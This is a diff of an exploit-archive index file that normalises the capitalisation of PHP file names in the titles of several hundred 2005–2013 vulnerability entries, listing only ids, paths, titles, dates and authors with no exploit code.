26192,platforms/php/webapps/26192.txt,"SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2005-08-23,rgod,php,webapps,0 @@ -23340,16 +23340,16 @@ id,file,description,date,author,platform,type,port 26196,platforms/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 Administration Console Cross-Site Scripting Vulnerability",2005-08-24,GomoR,windows,remote,0 26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog Html Injection Vulnerability",2005-08-24,ali202,php,webapps,0 26198,platforms/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 HTTP CONNECT Unauthorized Access Weakness",2005-08-25,"Oliver Karow",linux,remote,0 -26199,platforms/php/webapps/26199.txt,"PHPMyAdmin 2.x Error.PHP Cross-Site Scripting Vulnerability",2005-08-28,"Michal Cihar",php,webapps,0 +26199,platforms/php/webapps/26199.txt,"phpMyAdmin 2.x - Error.php Cross-Site Scripting Vulnerability",2005-08-28,"Michal Cihar",php,webapps,0 26200,platforms/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection Vulnerability",2005-08-29,"Jakob Balle",php,webapps,0 -26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 Api.PHP Remote File Include Vulnerability",2005-08-29,nf2@scheinwelt.at,php,webapps,0 +26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 Api.php Remote File Include Vulnerability",2005-08-29,nf2@scheinwelt.at,php,webapps,0 26202,platforms/php/webapps/26202.txt,"Looking Glass Cross-Site Scripting Vulnerability",2005-08-27,rgod,php,webapps,0 26203,platforms/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution Vulnerability",2005-08-27,rgod,php,webapps,0 -26204,platforms/php/webapps/26204.pl,"MyBB Member.PHP SQL Injection Vulnerability",2005-08-29,W7ED,php,webapps,0 +26204,platforms/php/webapps/26204.pl,"MyBB Member.php SQL Injection Vulnerability",2005-08-29,W7ED,php,webapps,0 26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 index.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 events.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 -26208,platforms/php/webapps/26208.txt,"AutoLinks 2.1 Pro Al_initialize.PHP Remote File Include Vulnerability",2005-08-29,4Degrees,php,webapps,0 +26208,platforms/php/webapps/26208.txt,"AutoLinks 2.1 Pro Al_initialize.php Remote File Include Vulnerability",2005-08-29,4Degrees,php,webapps,0 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 BBCode URL Tag Script Injection Vulnerability",2005-08-29,slacker4ever_1,php,webapps,0 26210,platforms/multiple/remote/26210.txt,"bfcommand & control server 1.22/2.0/2.14 manager - Multiple Vulnerabilities",2005-08-29,"Luigi Auriemma",multiple,remote,0 26211,platforms/php/webapps/26211.txt,"phpldapadmin 0.9.6/0.9.7 welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 @@ -23358,21 +23358,21 @@ id,file,description,date,author,platform,type,port 26214,platforms/windows/dos/26214.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow Vulnerability",2013-06-14,ariarat,windows,dos,0 26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 USR Parameter Cross-Site Scripting Vulnerability",2005-08-31,rgod,php,webapps,0 26216,platforms/windows/dos/26216.txt,"Indiatimes Messenger 6.0 - Remote Buffer Overflow Vulnerability",2005-08-31,ViPeR,windows,dos,0 -26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0 +26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.php Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0 26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0 26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP - Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0 -26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0 +26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.php HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0 26224,platforms/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 Description Field HTML Injection Vulnerability",2005-09-06,retrogod@aliceposta.it,php,webapps,0 26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary Remote File Upload Vulnerability",2005-09-06,rgod,php,webapps,0 26226,platforms/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps,0 -26227,platforms/php/webapps/26227.txt,"MyBulletinBoard 1.0 Forumdisplay.PHP Cross-Site Scripting Vulnerability",2005-09-06,Dominic.Parikh,php,webapps,0 +26227,platforms/php/webapps/26227.txt,"MyBulletinBoard 1.0 Forumdisplay.php Cross-Site Scripting Vulnerability",2005-09-06,Dominic.Parikh,php,webapps,0 26228,platforms/php/webapps/26228.txt,"MyBulletinBoard 1.0 - Multiple SQL Injection Vulnerabilities",2005-09-06,stranger-killer,php,webapps,0 26229,platforms/php/webapps/26229.txt,"PHPCommunityCalendar 4.0 - Multiple SQL Injection Vulnerabilities",2005-09-07,rgod,php,webapps,0 26230,platforms/windows/remote/26230.txt,"Microsoft IIS 5.1 WebDAV HTTP Request Source Code Disclosure Vulnerability",2005-09-04,"Inge Henriksen",windows,remote,0 -26231,platforms/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System SetCookie.PHP Directory Traversal Vulnerability",2005-09-07,rgod,php,webapps,0 +26231,platforms/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System SetCookie.php Directory Traversal Vulnerability",2005-09-07,rgod,php,webapps,0 26232,platforms/php/webapps/26232.txt,"PHPCommunityCalendar 4.0 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,php,webapps,0 26233,platforms/hardware/dos/26233.txt,"Cisco IOS 12.x Firewall Authentication Proxy Buffer Overflow Vulnerability",2005-09-07,Markus,hardware,dos,0 26234,platforms/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - startup.php Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 @@ -23386,7 +23386,7 @@ id,file,description,date,author,platform,type,port 26244,platforms/php/webapps/26244.txt,"SPBAS Business Automation Software 2012 - Multiple Vulnerabilities",2013-06-17,"Christy Philip Mathew",php,webapps,0 26245,platforms/windows/local/26245.py,"Winamp 5.12 - (.m3u) Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0 26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass Vulnerability",2013-06-17,Chako,php,webapps,0 -26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 RateThread.PHP SQL Injection Vulnerability",2005-09-09,stranger-killer,php,webapps,0 +26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 RateThread.php SQL Injection Vulnerability",2005-09-09,stranger-killer,php,webapps,0 26248,platforms/linux/dos/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,dos,0 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service Vulnerability",2005-09-09,Shiraishi.M,linux,dos,0 26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service Vulnerability",2005-09-12,"Infam0us Gr0up",multiple,dos,0 @@ -23396,13 +23396,13 @@ id,file,description,date,author,platform,type,port 26254,platforms/php/webapps/26254.txt,"Land Down Under 800/801 plug.php e Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 26255,platforms/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload Vulnerability",2005-09-13,rgod,php,webapps,0 26256,platforms/cgi/webapps/26256.txt,"MIVA Merchant 5 Merchant.MVC Cross-Site Scripting Vulnerability",2005-09-14,admin@hyperconx.com,cgi,webapps,0 -26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 Password_Reminder.PHP SQL Injection Vulnerability",2005-09-14,rgod,php,webapps,0 +26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 Password_Reminder.php SQL Injection Vulnerability",2005-09-14,rgod,php,webapps,0 26258,platforms/php/webapps/26258.txt,"ATutor 1.5.1 Chat Logs Remote Information Disclosure Vulnerability",2005-09-14,rgod,php,webapps,0 -26259,platforms/php/webapps/26259.txt,"Noah's Classifieds 1.2/1.3 Index.PHP SQL Injection Vulnerability",2005-09-14,trueend5,php,webapps,0 +26259,platforms/php/webapps/26259.txt,"Noah's Classifieds 1.2/1.3 Index.php SQL Injection Vulnerability",2005-09-14,trueend5,php,webapps,0 26260,platforms/php/webapps/26260.txt,"TWiki TWikiUsers Remote Arbitrary Command Execution Vulnerability",2005-09-14,B4dP4nd4,php,webapps,0 -26261,platforms/php/webapps/26261.txt,"Noah's Classifieds 1.3 Index.PHP Cross-Site Scripting Vulnerability",2005-09-14,trueend5,php,webapps,0 +26261,platforms/php/webapps/26261.txt,"Noah's Classifieds 1.3 Index.php Cross-Site Scripting Vulnerability",2005-09-14,trueend5,php,webapps,0 26262,platforms/php/webapps/26262.txt,"Digital Scribe 1.4 Login SQL Injection Vulnerability",2005-09-15,rgod,php,webapps,0 -26263,platforms/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - Search_Result.PHP SQL Injection Vulnerability",2005-09-15,alexsrb,php,webapps,0 +26263,platforms/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - Search_Result.php SQL Injection Vulnerability",2005-09-15,alexsrb,php,webapps,0 26264,platforms/php/webapps/26264.txt,"DeluxeBB 1.0 topic.php tid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26265,platforms/php/webapps/26265.txt,"DeluxeBB 1.0 misc.php uid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 forums.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 @@ -23412,35 +23412,35 @@ id,file,description,date,author,platform,type,port 26334,platforms/asp/webapps/26334.txt,"aeNovo /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 26271,platforms/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 Data URI Memory Corruption Vulnerability",2005-09-17,"Jonathan Rockway",osx,dos,0 -26272,platforms/php/webapps/26272.txt,"EPay Pro 2.0 Index.PHP Directory Traversal Vulnerability",2005-09-19,h4cky0u,php,webapps,0 +26272,platforms/php/webapps/26272.txt,"EPay Pro 2.0 Index.php Directory Traversal Vulnerability",2005-09-19,h4cky0u,php,webapps,0 26273,platforms/php/webapps/26273.txt,"VBulletin 1.0.1 lite/2.x/3.0 joinrequests.php request Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 26274,platforms/php/webapps/26274.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/user.php Multiple Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 26275,platforms/php/webapps/26275.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/usertitle.php usertitleid Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 26276,platforms/php/webapps/26276.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/usertools.php ids Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26277,platforms/php/webapps/26277.txt,"NooToplist 1.0 Index.PHP Multiple SQL Injection Vulnerabilities",2005-09-19,"David Sopas Ferreira",php,webapps,0 +26277,platforms/php/webapps/26277.txt,"NooToplist 1.0 Index.php Multiple SQL Injection Vulnerabilities",2005-09-19,"David Sopas Ferreira",php,webapps,0 26278,platforms/php/webapps/26278.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/css.php group Parameter XSS",2005-09-19,deluxe@security-project.org,php,webapps,0 26279,platforms/php/webapps/26279.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/index.php Multiple Parameter XSS",2005-09-19,deluxe@security-project.org,php,webapps,0 26280,platforms/php/webapps/26280.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/user.php email Parameter XSS",2005-09-19,deluxe@security-project.org,php,webapps,0 26281,platforms/php/webapps/26281.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/language.php goto Parameter XSS",2005-09-19,deluxe@security-project.org,php,webapps,0 26282,platforms/php/webapps/26282.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/modlog.php orderby Parameter XSS",2005-09-19,deluxe@security-project.org,php,webapps,0 26283,platforms/php/webapps/26283.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/template.php Multiple Parameter XSS",2005-09-19,deluxe@security-project.org,php,webapps,0 -26284,platforms/php/webapps/26284.txt,"MX Shop 3.2 Index.PHP Multiple SQL Injection Vulnerabilities",2005-09-19,"David Sopas Ferreira",php,webapps,0 +26284,platforms/php/webapps/26284.txt,"MX Shop 3.2 Index.php Multiple SQL Injection Vulnerabilities",2005-09-19,"David Sopas Ferreira",php,webapps,0 26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 Session ID Authentication Bypass Vulnerability",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 -26300,platforms/php/webapps/26300.txt,"LucidCMS 2.0 Index.PHP Cross-Site Scripting Vulnerability",2005-09-27,X1ngBox,php,webapps,0 +26300,platforms/php/webapps/26300.txt,"LucidCMS 2.0 Index.php Cross-Site Scripting Vulnerability",2005-09-27,X1ngBox,php,webapps,0 26301,platforms/windows/dos/26301.txt,"Novell GroupWise 6.5.3 Client Local Integer Overflow Vulnerability",2005-09-27,"Francisco Amato",windows,dos,0 26302,platforms/php/webapps/26302.txt,"TWiki TWikiUsers INCLUDE Function Remote Arbitrary Command Execution Vulnerability",2005-09-28,JChristophFuchs,php,webapps,0 26303,platforms/php/webapps/26303.txt,"CubeCart 3.0.3 index.php Multiple Parameter XSS",2005-09-28,Lostmon,php,webapps,0 26304,platforms/php/webapps/26304.txt,"CubeCart 3.0.3 cart.php redir Parameter XSS",2005-09-28,Lostmon,php,webapps,0 -26305,platforms/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin Add.PHP Cross-Site Scripting Vulnerability",2005-09-29,anonymous,php,webapps,0 +26305,platforms/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin Add.php Cross-Site Scripting Vulnerability",2005-09-29,anonymous,php,webapps,0 26306,platforms/windows/remote/26306.txt,"NateOn Messenger 3.0 - Arbitrary File Download And Buffer Overflow Vulnerabilities",2005-09-29,saintlinu,windows,remote,0 26307,platforms/php/webapps/26307.txt,"lucidCMS 2.0 Login SQL Injection Vulnerability",2005-09-29,rgod,php,webapps,0 26308,platforms/php/webapps/26308.txt,"IceWarp Web Mail 5.5.1 blank.html id Parameter XSS",2005-09-30,ss_contacts,php,webapps,0 26309,platforms/php/webapps/26309.txt,"IceWarp Web Mail 5.5.1 calendar_d.html createdataCX Parameter XSS",2005-09-30,ss_contacts,php,webapps,0 26310,platforms/php/webapps/26310.txt,"IceWarp Web Mail 5.5.1 calendar_m.html createdataCX Parameter XSS",2005-09-30,ss_contacts,php,webapps,0 26311,platforms/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 calendar_w.html createdataCX Parameter XSS",2005-09-30,ss_contacts,php,webapps,0 -26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 Printfaq.PHP Directory Traversal Vulnerability",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 +26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 Printfaq.php Directory Traversal Vulnerability",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r Arbitrary File Deletion Vulnerability",2005-09-30,ShineShadow,php,webapps,0 26386,platforms/php/webapps/26386.txt,"Nuked-Klan 1.7 Forum Module Multiple Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26387,platforms/php/webapps/26387.txt,"Nuked-Klan 1.7 Sections Module artid Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 @@ -23456,7 +23456,7 @@ id,file,description,date,author,platform,type,port 26323,platforms/windows/local/26323.cpp,"Microsoft Windows XP Wireless Zero Configuration Service Information Disclosure Vulnerability",2005-10-04,"Laszlo Toth",windows,local,0 26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0 26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 IFRAME Handling Denial of Service Vulnerability",2005-10-05,"Tom Ferris",multiple,dos,0 -26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - Search.PHP SQL Injection Vulnerability",2005-10-06,trueend5,php,webapps,0 +26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - Search.php SQL Injection Vulnerability",2005-10-06,trueend5,php,webapps,0 26335,platforms/asp/webapps/26335.txt,"Aenovo Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0 26336,platforms/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,dos,0 26337,platforms/php/webapps/26337.php,"Cyphor 0.19 lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0 @@ -23469,10 +23469,10 @@ id,file,description,date,author,platform,type,port 26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution Vulnerability",2005-10-12,"David Maciejak",cgi,webapps,0 26345,platforms/php/webapps/26345.txt,"YaPig 0.95 b view.php img_size Parameter XSS",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0 26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager Password Field SQL Injection Vulnerability",2005-10-13,imready4chillin,php,webapps,0 -26347,platforms/php/webapps/26347.txt,"Gallery 2.0 Main.PHP Directory Traversal Vulnerability",2005-10-14,"Michael Dipper",php,webapps,0 +26347,platforms/php/webapps/26347.txt,"Gallery 2.0 Main.php Directory Traversal Vulnerability",2005-10-14,"Michael Dipper",php,webapps,0 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter SQL Injection Vulnerability",2005-10-14,BiPi_HaCk,php,webapps,0 26349,platforms/php/webapps/26349.txt,"Complete PHP Counter Cross-Site Scripting Vulnerability",2005-10-14,BiPi_HaCk,php,webapps,0 -26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x Search.PHP SQL Injection Vulnerability",2005-10-15,Devil_box,php,webapps,0 +26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x Search.php SQL Injection Vulnerability",2005-10-15,Devil_box,php,webapps,0 26351,platforms/asp/webapps/26351.txt,"Comersus BackOffice Plus Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0 26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0 26353,platforms/linux/local/26353.txt,"Linux Kernel <= 2.6 - Console Keymap Local Command Injection PoC",2005-10-17,"Rudolf Polzer",linux,local,0 @@ -23499,24 +23499,24 @@ id,file,description,date,author,platform,type,port 26374,platforms/windows/remote/26374.txt,"Xerver 4.17 Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0 26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0 26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server URI Null Character XSS",2005-10-19,"Ziv Kamir",windows,remote,0 -26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - Modules.PHP Remote Directory Traversal Vulnerability",2005-10-19,sp3x@securityreason.com,php,webapps,0 +26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - Modules.php Remote Directory Traversal Vulnerability",2005-10-19,sp3x@securityreason.com,php,webapps,0 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum newtopic.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum quote.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum recommend.php ID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26381,platforms/php/webapps/26381.txt,"Chipmunk Directory recommend.php entryID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service Vulnerability",2005-10-20,"Rémi Denis-Courmont",linux,dos,0 -26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 Detail.PHP HTML Injection Vulnerability",2005-10-22,sikikmail,php,webapps,0 -26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x Index.PHP Multiple Remote File Include Vulnerabilities",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 -26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x Index.PHP Cross-Site Scripting Vulnerability",2005-10-26,alex@aleksanet.com,php,webapps,0 +26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 Detail.php HTML Injection Vulnerability",2005-10-22,sikikmail,php,webapps,0 +26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x Index.php Multiple Remote File Include Vulnerabilities",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 +26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x Index.php Cross-Site Scripting Vulnerability",2005-10-26,alex@aleksanet.com,php,webapps,0 26388,platforms/php/webapps/26388.txt,"Nuked-Klan 1.7 Download Module dl_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26389,platforms/php/webapps/26389.pl,"Nuked-Klan 1.7 Links Module link_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26390,platforms/php/webapps/26390.txt,"saphp Lesson add.php forumid Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 26391,platforms/php/webapps/26391.html,"SiteTurn Domain Manager Pro Admin Panel Cross-Site Scripting Vulnerability",2005-10-24,"farhad koosha",php,webapps,0 -26392,platforms/php/webapps/26392.txt,"phpMyAdmin 2.x queryframe.php XSS",2005-05-20,"Tobias Klein",php,webapps,0 -26393,platforms/php/webapps/26393.txt,"phpMyAdmin 2.x server_databases.php XSS",2005-05-20,"Tobias Klein",php,webapps,0 -26394,platforms/php/webapps/26394.txt,"MWChat 6.8 Chat.PHP SQL Injection Vulnerability",2005-05-21,rgod,php,webapps,0 -26395,platforms/php/webapps/26395.txt,"Basic Analysis And Security Engine 1.2 Base_qry_main.PHP SQL Injection Vulnerability",2005-10-25,"Remco Verhoef",php,webapps,0 -26396,platforms/php/webapps/26396.pl,"MyBulletinBoard 1.0 Usercp.PHP SQL Injection Vulnerability",2005-10-26,Animal,php,webapps,0 +26392,platforms/php/webapps/26392.txt,"phpMyAdmin 2.x - queryframe.php XSS",2005-05-20,"Tobias Klein",php,webapps,0 +26393,platforms/php/webapps/26393.txt,"phpMyAdmin 2.x - server_databases.php XSS",2005-05-20,"Tobias Klein",php,webapps,0 +26394,platforms/php/webapps/26394.txt,"MWChat 6.8 Chat.php SQL Injection Vulnerability",2005-05-21,rgod,php,webapps,0 +26395,platforms/php/webapps/26395.txt,"Basic Analysis And Security Engine 1.2 Base_qry_main.php SQL Injection Vulnerability",2005-10-25,"Remco Verhoef",php,webapps,0 +26396,platforms/php/webapps/26396.pl,"MyBulletinBoard 1.0 Usercp.php SQL Injection Vulnerability",2005-10-26,Animal,php,webapps,0 26397,platforms/php/webapps/26397.txt,"IPBProArcade 2.5.2 GameID Parameter Remote SQL Injection Vulnerability",2005-10-26,almaster,php,webapps,0 26398,platforms/cgi/webapps/26398.txt,"RSA ACE Agent 5.x Image Cross-Site Scripting Vulnerability",2005-10-26,"Bernhard Mueller",cgi,webapps,0 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Include Vulnerability",2005-10-26,X,php,webapps,0 @@ -23527,7 +23527,7 @@ id,file,description,date,author,platform,type,port 26404,platforms/windows/local/26404.py,"MediaCoder PMP Edition 0.8.17 - (.m3u) Buffer Overflow Exploit",2013-06-24,metacom,windows,local,0 26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 (play.php gid param) - SQL Injection Vulnerability",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault OSSIM Open Source SIEM 4.1 - Multiple SQL Vulnerabilities",2013-06-24,"Glafkos Charalambous ",php,webapps,0 -27541,platforms/php/webapps/27541.txt,"DbbS 2.0 Topics.PHP SQL Injection Vulnerability",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 +27541,platforms/php/webapps/27541.txt,"DbbS 2.0 Topics.php SQL Injection Vulnerability",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 26408,platforms/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -23545,11 +23545,11 @@ id,file,description,date,author,platform,type,port 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage JustGetSNMPQueue Command Injection",2013-06-24,metasploit,windows,remote,2381 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload Vulnerability",2013-06-24,metasploit,php,remote,0 26422,platforms/linux/remote/26422.rb,"MoinMoin twikidraw Action Traversal File Upload",2013-06-24,metasploit,linux,remote,0 -26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 Bug_sponsorship_list_view_inc.PHP File Include Vulnerability",2005-10-26,"Andreas Sandblad",php,webapps,0 +26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 Bug_sponsorship_list_view_inc.php File Include Vulnerability",2005-10-26,"Andreas Sandblad",php,webapps,0 26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution Vulnerability",2005-10-26,"D. Fabian",windows,remote,0 -26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x Info-DB Info_db.PHP Multiple SQL Injection Vulnerabilities",2005-10-26,admin@batznet.com,php,webapps,0 +26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x Info-DB Info_db.php Multiple SQL Injection Vulnerabilities",2005-10-26,admin@batznet.com,php,webapps,0 26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts Multiple SQL Injection Vulnerabilities",2005-10-26,"farhad koosha",asp,webapps,0 -26427,platforms/php/webapps/26427.txt,"GCards 1.43 News.PHP SQL Injection Vulnerability",2005-10-26,svsecurity,php,webapps,0 +26427,platforms/php/webapps/26427.txt,"GCards 1.43 News.php SQL Injection Vulnerability",2005-10-26,svsecurity,php,webapps,0 26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke HTML Injection Vulnerability",2005-10-26,bhfh01,php,webapps,0 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 @@ -23560,15 +23560,15 @@ id,file,description,date,author,platform,type,port 26435,platforms/asp/webapps/26435.txt,"ASP Fast Forum Error.ASP Cross-Site Scripting Vulnerability",2005-10-27,syst3m_f4ult,asp,webapps,0 26436,platforms/php/webapps/26436.txt,"MG2 0.5.1 - Authentication Bypass Vulnerability",2005-10-29,"Preben Nylokken",php,webapps,0 